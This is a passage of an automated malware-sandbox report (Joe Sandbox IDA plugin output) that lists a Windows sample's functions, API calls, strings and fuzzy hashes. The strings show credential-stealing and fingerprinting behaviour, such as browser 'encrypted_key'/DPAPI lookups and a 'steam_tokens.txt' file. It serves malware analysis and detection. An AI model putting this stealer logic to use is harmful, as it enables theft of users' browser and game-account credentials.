                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        • Opcode ID: a320a8111bf2741256d16c488fc3cb4bd71912493e5aaad4424e9486cab1ce09
                        • Instruction ID: 208eee261c82ef8895694925ba8617464544410a4eb19c04ffbe62566bd7bc26
                        • Opcode Fuzzy Hash: a320a8111bf2741256d16c488fc3cb4bd71912493e5aaad4424e9486cab1ce09
                        • Instruction Fuzzy Hash: 6D417371A1010CAFDB58EF64EC86ADE7775AF44308F404069B90D97251EE34AEC98F95
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 00449CA8
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00449CDA
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00449D03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocLocallstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2746078483-738592651
                        • Opcode ID: d3e20cfdbbeaf55dcedb6708a29ea1142034a85dd4e6f7419ca04d5d1e0b8acf
                        • Instruction ID: 783b70ee2c6ae2c0b4c183280606c0e0eb2985ede7cda610fc8dab915b1a8e52
                        • Opcode Fuzzy Hash: d3e20cfdbbeaf55dcedb6708a29ea1142034a85dd4e6f7419ca04d5d1e0b8acf
                        • Instruction Fuzzy Hash: 2D41D071E006099BEB21EF65DD856AFB7B4AF44308F04406AFD15A7352EA78ED00C798
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045EA24
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045EA53
                        • lstrcat.KERNEL32(?,00000000), ref: 0045EA61
                        • lstrcat.KERNEL32(?,00471794), ref: 0045EA7A
                        • lstrcat.KERNEL32(?,01589268), ref: 0045EA8D
                        • lstrcat.KERNEL32(?,00471794), ref: 0045EA9F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: a9213c00813d909cb68aa6f64ced00dc588fb9b5854e59b9ce215fadeefdff2c
                        • Instruction ID: d83bbb6aeeac9feb991bff8e8bd546cef28032ce5fe76f52713d4fe26bc0e852
                        • Opcode Fuzzy Hash: a9213c00813d909cb68aa6f64ced00dc588fb9b5854e59b9ce215fadeefdff2c
                        • Instruction Fuzzy Hash: D341E671A10118AFDB19EB64DC42FED73B5BF48300F4044ADBA1AA7351DE749E848F64
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045ECDF
                        • lstrlen.KERNEL32(00000000), ref: 0045ECF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045ED1D
                        • lstrlen.KERNEL32(00000000), ref: 0045ED24
                        • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0045ED52
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: steam_tokens.txt
                        • API String ID: 367037083-401951677
                        • Opcode ID: b7018f040ee37ee35448969189da786273f5a5547ab20a180c1fca5596fbba62
                        • Instruction ID: cbe0a42d3d937258b2b4b8acbb252e05b094658d706eaf40eb68cdbb98bf4ce3
                        • Opcode Fuzzy Hash: b7018f040ee37ee35448969189da786273f5a5547ab20a180c1fca5596fbba62
                        • Instruction Fuzzy Hash: D631A131B101055BE726BB3AED4A95FB7A4AF40305F401026FC45DB312DB6CDD0947A9
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0044140E), ref: 00449A9A
                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0044140E), ref: 00449AB0
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,0044140E), ref: 00449AC7
                        • ReadFile.KERNEL32(00000000,00000000,?,0044140E,00000000,?,?,?,0044140E), ref: 00449AE0
                        • LocalFree.KERNEL32(?,?,?,?,0044140E), ref: 00449B00
                        • CloseHandle.KERNEL32(00000000,?,?,?,0044140E), ref: 00449B07
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: ec3f5971b388e3d5eaf0cca334cb827e63731d59930deb535142f169941a483b
                        • Instruction ID: e7a6ff630ddd9f2379d546ec6ac574673d6c3654a4acaa9288def0cb164f347f
                        • Opcode Fuzzy Hash: ec3f5971b388e3d5eaf0cca334cb827e63731d59930deb535142f169941a483b
                        • Instruction Fuzzy Hash: EB115E71600209AFE710DFA9DD88EAB73BDFB04340F10015AF905A7280EB78AD40CBA5
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465B14
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00465B7C
                        • memmove.MSVCRT(00000000,?,?), ref: 00465B89
                        • memmove.MSVCRT(00000000,?,?), ref: 00465B98
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long
                        • API String ID: 2052693487-3788999226
                        • Opcode ID: e3e96f4011864833c1aeede3f94dbf2919798ed6ead8e95162d698ca9575863f
                        • Instruction ID: 87124a48c6a07434a9e9154e526a6bc69b811c52ecf0d36bab6a07e356590a79
                        • Opcode Fuzzy Hash: e3e96f4011864833c1aeede3f94dbf2919798ed6ead8e95162d698ca9575863f
                        • Instruction Fuzzy Hash: 84419271B005199FCF18DF6CC991AAEBBF5EB89710F14822AE909E7344E634ED00CB95
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        • Opcode ID: a9da2648693fce3585fa4a49c652317d3d6ce4b2a28aca028189ca78fed75925
                        • Instruction ID: f849c9c40b70f01321f7a974e744239d5f48a9a15caf74ba82a0085a692a04ca
                        • Opcode Fuzzy Hash: a9da2648693fce3585fa4a49c652317d3d6ce4b2a28aca028189ca78fed75925
                        • Instruction Fuzzy Hash: 084128B050074CAEDB218B24CD94FFB7BFC9B46704F1448E9E98686182F2B59E458F29
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457D58
                          • Part of subcall function 0046A1C0: std::exception::exception.LIBCMT ref: 0046A1D5
                          • Part of subcall function 0046A1C0: std::exception::exception.LIBCMT ref: 0046A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457D76
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$std::exception::exception
                        • String ID: invalid string position$string too long
                        • API String ID: 3310641104-4289949731
                        • Opcode ID: 2a4b1c18a1fc3777be1211ac036b2346daf995b061a2efc151ce30c4695118eb
                        • Instruction ID: 5e7957435e389a1c103b317113ecaa0cf71808f8e5e11107f00d7a0c465f64d0
                        • Opcode Fuzzy Hash: 2a4b1c18a1fc3777be1211ac036b2346daf995b061a2efc151ce30c4695118eb
                        • Instruction Fuzzy Hash: FE21D2323047004BD720DE6CE881A7AF7E5EF92755B204A3FE8468B342D779DC0887A9
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004633EF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004633F6
                        • GlobalMemoryStatusEx.KERNEL32 ref: 00463411
                        • wsprintfA.USER32 ref: 00463437
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB
                        • API String ID: 2922868504-2651807785
                        • Opcode ID: f52ff5b10ed559d971aceb7f1c52a2f8aee0ca08e4379ab007b319c70a63275a
                        • Instruction ID: f09529127b19022020cbe0a24f32aa0559a97ab85262aa1563105776fc8a0b55
                        • Opcode Fuzzy Hash: f52ff5b10ed559d971aceb7f1c52a2f8aee0ca08e4379ab007b319c70a63275a
                        • Instruction Fuzzy Hash: 43012DB1A00244AFD704DF98CC45F6EB7B9FB44711F00012AF906E7380D7785D0086A6
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlenmemset
                        • String ID:
                        • API String ID: 3212139465-0
                        • Opcode ID: aec3946f76839f0971bac5a6439d1d09a35cfbc684aad1545e7ecf43439baf3f
                        • Instruction ID: 0eb430d4823153b550abd64859026b1d9eb53b25837fbd0425cc62ae3a4ea4a4
                        • Opcode Fuzzy Hash: aec3946f76839f0971bac5a6439d1d09a35cfbc684aad1545e7ecf43439baf3f
                        • Instruction Fuzzy Hash: 7C81F6B0E00205ABDB14DF95CD44BAEB7B5AF84304F14817EE509A7381FBB99D41CB9A
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00457F31
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00457F60
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 00457FA5
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 00457FD3
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 00458007
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 3235a4e0e80d75ea6c3764523c8cd0db956d13d0a1ccb1fa67da89c83936ca27
                        • Instruction ID: e721cd96565e563b0cabf8314324cba0aab6d1b2aa151afc5ba42ba6f168b150
                        • Opcode Fuzzy Hash: 3235a4e0e80d75ea6c3764523c8cd0db956d13d0a1ccb1fa67da89c83936ca27
                        • Instruction Fuzzy Hash: B041C531604106DFCB20DF58E480EAE77F4FF59301B11416AE805D7352DB78EA5ACB95
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 004580BB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004580EA
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 00458102
                        • lstrlen.KERNEL32(00000000), ref: 00458140
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045816F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: f8107ff241c7db44d1c1612d61d14da214af00900e7704085611f14ab59f91fc
                        • Instruction ID: 4990fc02d9379fc747e0d8dd432c4d156e590e0d16be23da6eabf1ae77d39704
                        • Opcode Fuzzy Hash: f8107ff241c7db44d1c1612d61d14da214af00900e7704085611f14ab59f91fc
                        • Instruction Fuzzy Hash: FC418C71600106ABDB21DF78D944BABBBF4EB44701F11841EAC49E7346EF38D94ACB94
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00461B72
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0046184F
                          • Part of subcall function 00461820: lstrlen.KERNEL32(015772C8), ref: 00461860
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,00000000), ref: 00461887
                          • Part of subcall function 00461820: lstrcat.KERNEL32(00000000,00000000), ref: 00461892
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,00000000), ref: 004618C1
                          • Part of subcall function 00461820: lstrlen.KERNEL32(00474FA0), ref: 004618D3
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,00000000), ref: 004618F4
                          • Part of subcall function 00461820: lstrcat.KERNEL32(00000000,00474FA0), ref: 00461900
                          • Part of subcall function 00461820: lstrcpy.KERNEL32(00000000,00000000), ref: 0046192F
                        • sscanf.NTDLL ref: 00461B9A
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00461BB6
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00461BC6
                        • ExitProcess.KERNEL32 ref: 00461BE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                        • String ID:
                        • API String ID: 3040284667-0
                        • Opcode ID: 731e704e665aa84167829278ee6569118bb43f75c1ca18fe6865c1e92f52021e
                        • Instruction ID: caab436a6ca45f6d4af34c6915c80bc0b32bc4c5d8f003d6f687d2b5de74d6fb
                        • Opcode Fuzzy Hash: 731e704e665aa84167829278ee6569118bb43f75c1ca18fe6865c1e92f52021e
                        • Instruction Fuzzy Hash: EB21E2B1518301AF8354EF69D88485FBBF9EED9314F409A1EF599C3220E734E5088BA7
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00463166
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0046316D
                        • RegOpenKeyExA.ADVAPI32(80000002,0157BEF8,00000000,00020119,?), ref: 0046318C
                        • RegQueryValueExA.ADVAPI32(?,0158D730,00000000,00000000,00000000,000000FF), ref: 004631A7
                        • RegCloseKey.ADVAPI32(?), ref: 004631B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 32b6cae0f90a5d798a4b25009c1c030a14e465421e813c2ef6efcb6da1f05b72
                        • Instruction ID: 1246a7a88556a297478dba3afd7acbb7c9bd201da618326acd9d115402587ed1
                        • Opcode Fuzzy Hash: 32b6cae0f90a5d798a4b25009c1c030a14e465421e813c2ef6efcb6da1f05b72
                        • Instruction Fuzzy Hash: E1114276A40205AFD714CF94DD49FBBB7BDE744721F10421AFA09E3780DB7559408BA1
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00448996
                          • Part of subcall function 0046A1C0: std::exception::exception.LIBCMT ref: 0046A1D5
                          • Part of subcall function 0046A1C0: std::exception::exception.LIBCMT ref: 0046A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 004489CD
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: invalid string position$string too long
                        • API String ID: 2002836212-4289949731
                        • Opcode ID: 81c324f1f6c3e950b66240bd06ce8f55aff58c59096f6d1b6ed0f260ed498598
                        • Instruction ID: 176fec820fbe9d5c8fae938e56940544a74ee6d5d56bbdd37565db63cec66975
                        • Opcode Fuzzy Hash: 81c324f1f6c3e950b66240bd06ce8f55aff58c59096f6d1b6ed0f260ed498598
                        • Instruction Fuzzy Hash: FE21D872300A504BE720DA5CE840A6EF795DBA2765B14093FF141CB341DBB5DC41C7AE
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00448883
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 39db1d148e19fb72ccd3ef6d8f9b7596fbea4df4b8aec231f270161f7f76225e
                        • Instruction ID: 1ee76f98a1540c3722b44923f225ee604e8afe297303586aaaf37124ffb1639d
                        • Opcode Fuzzy Hash: 39db1d148e19fb72ccd3ef6d8f9b7596fbea4df4b8aec231f270161f7f76225e
                        • Instruction Fuzzy Hash: E331B7B5E005199FCB08DF58C8916AEBBB6EB88350F14826EE905EB344DB34AD01CB95
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465922
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465935
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_std::exception::exception
                        • String ID: Sec-WebSocket-Version: 13$string too long
                        • API String ID: 1928653953-3304177573
                        • Opcode ID: 05aa31046518d5b87bc9fe7fff24e227387b47e38e35d1ef9db86cebb643c593
                        • Instruction ID: b647ac24c53424bfb3322dc331b0db6c313baeaccb19d31252218173587f2e7c
                        • Opcode Fuzzy Hash: 05aa31046518d5b87bc9fe7fff24e227387b47e38e35d1ef9db86cebb643c593
                        • Instruction Fuzzy Hash: FC118E70304B40CBC7318B2CE900B1AB7E1ABD2760F250A5FE0D187795E769E849C7AA
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0046A430,000000FF), ref: 00463D20
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00463D27
                        • wsprintfA.USER32 ref: 00463D37
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 2bc92569200d2f4b11672df23abd8692008890971aa82d8b6bc24bb48210ba26
                        • Instruction ID: 4441a5082c73b1a9dbdc4cc26afa4c80e3d6dffb0d8603ef4cf5a8c3a33e196a
                        • Opcode Fuzzy Hash: 2bc92569200d2f4b11672df23abd8692008890971aa82d8b6bc24bb48210ba26
                        • Instruction Fuzzy Hash: 2101D271A90700BFE7145B55DC0EF6ABBB9FB45B61F10011AFA09972D0DBB81D40CAB6
                        APIs
                        • __getptd.LIBCMT ref: 00469279
                          • Part of subcall function 004687FF: __amsg_exit.LIBCMT ref: 0046880F
                        • __amsg_exit.LIBCMT ref: 00469299
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit$__getptd
                        • String ID: XuG$XuG
                        • API String ID: 441000147-3412426340
                        • Opcode ID: 3398971357c22b84344c8dc0bd867f8c252f97bcd9936d2f4b6b1cf435872872
                        • Instruction ID: e4a282f616e907db798c228954d2cadaac4e590040deb404c894971060d53f87
                        • Opcode Fuzzy Hash: 3398971357c22b84344c8dc0bd867f8c252f97bcd9936d2f4b6b1cf435872872
                        • Instruction Fuzzy Hash: BB01C432906711BBD610AB2A980579E73A46F00718F54446FE80467681EBBC6C81DBDF
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00448737
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 1a818784cc110defeacea478c0fb537210812ed055bc3917821c15192821f429
                        • Instruction ID: 07883a3344ca230baac519e6fbdc2cad752b4f9802849d232ac06e7fe3b6da4f
